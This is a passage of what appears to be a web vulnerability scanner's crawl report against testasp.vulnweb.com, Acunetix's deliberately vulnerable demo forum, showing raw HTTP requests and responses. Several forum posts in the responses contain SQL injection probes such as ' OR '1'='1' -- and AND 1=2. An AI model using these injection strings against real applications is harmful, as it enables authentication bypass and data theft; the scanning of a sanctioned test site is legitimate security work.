</tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not 